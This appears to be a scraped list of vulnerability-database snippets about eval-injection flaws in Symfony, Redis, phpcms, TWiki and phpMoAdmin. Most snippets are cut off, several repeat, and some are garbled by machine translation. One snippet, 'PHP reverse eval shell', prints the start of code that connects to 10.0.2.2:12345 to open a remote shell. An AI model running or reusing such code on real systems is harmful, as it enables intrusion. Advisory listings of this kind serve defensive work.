CVE-2015-2308

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

CVE-2015-2308

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

UBUNTU-CVE-2015-2308

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

Sql injection

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

CVE-2015-2308

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

CVE-2015-2308

Symfony 2.x vulnerable to PHP code execution via HTTP cache HttpCache Eval injection. Affected: HttpKernel HttpCache class when ESI is enabled. Root cause: language="php" attribute in SCRIPT elements not escaped before eval(). Affected versions: Symfony 2.0.x–2.6.x with fixes in 2.3.27, 2.5.11, a...

Redis EVAL Lua Sandbox Security Bypass Vulnerability

Redis is an open source memory-based and key-value pair storage the simplest form of database organization database system. Redis has a security vulnerability that allows a remote attacker to bypass certain security restrictions by submitting a special eval command to execute arbitrary Lua byteco...

DEBIAN-CVE-2015-4335

Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command...

AZL-44232 CVE-2015-4335 affecting package compat-lua 5.1.5-17

Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command...

CVE-2015-4335

Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command...

UBUNTU-CVE-2015-4335

Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command...

CVE-2015-4335

CVE-2015-4335: Redis EVAL Lua sandbox escape . The vulnerability affects Redis up to 2.8.21 and 3.x up to 3.0.2, where remote attackers could abuse the EVAL Lua command to execute arbitrary Lua bytecode, potentially escaping the sandbox and running code with Redis process privileges. Debian’s adv...

FreeBSD : redis -- EVAL Lua Sandbox Escape (838fa84a-0e25-11e5-90e4-d050996490d0)

Ben Murphy reports : It is possible to break out of the Lua sandbox in Redis and execute arbitrary code. This shouldn't pose a threat to users under the trusted Redis security model where only trusted users can connect to the database. However, in real deployments there could be databases that ca...

DSA-3279-1 redis - security update

Bulletin has no description...

phpcms front Desk arbitrary code execution php must be less than 5. 3-the vulnerabilities and early warning-the black bar safety net

phpcms v9 string2arrayfunction using the eval function,in more than one place may cause code execution vulnerability /phpssoserver/phpcms/libs/functions/global.func.php | 1 2 3 4 5 6 7 8 9 1 0 1 1 | / Converts a string to an array @param string $data the string @return array returns the array...

PHP reverse eval shell

Сделан для прокидывания через RCE при ограничениях exec и подобному. Использует только fsockopen и eval Форкается если есть pcntlfork PHP код: settimelimit0; if functionexistspcntlfork $pid = pcntlfork; if$pid==1 exit1; if$pid exit0; ifposixsetsid==1 exit1; $sock = fsockopen'10.0.2.2',12345,...

TWiki Debugenableplugins Remote Code Execution Exploit

TWiki versions 4.0.x through 6.0.0 contain a vulnerability in the Debug functionality. The value of the debugenableplugins parameter is used without proper sanitization in an Perl eval statement which allows remote code execution. This module requires Metasploit: http://metasploit.com/download...

MongoDB management tool exposure remote code execution vulnerability-vulnerability warning-the black bar safety net

MongoDB, the IT sector mainstream non-relational database NoSQL platform is one that is based on a table of a relational database of the popular alternatives. Recently, the management for MongoDB is a GUI tool phpMoAdmin is the storm has a very serious security vulnerability, once exploited, this...

TWiki Debugenableplugins - Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'TWiki Debugenableplugins Remote Code Execution', 'Description' = %q TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug...

TWiki Debugenableplugins Remote Code Execution

TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality. The value of the debugenableplugins parameter is used without proper sanitization in an Perl eval statement which allows remote code execution. This module requires Metasploit: https://metasploit.com/download Current source:...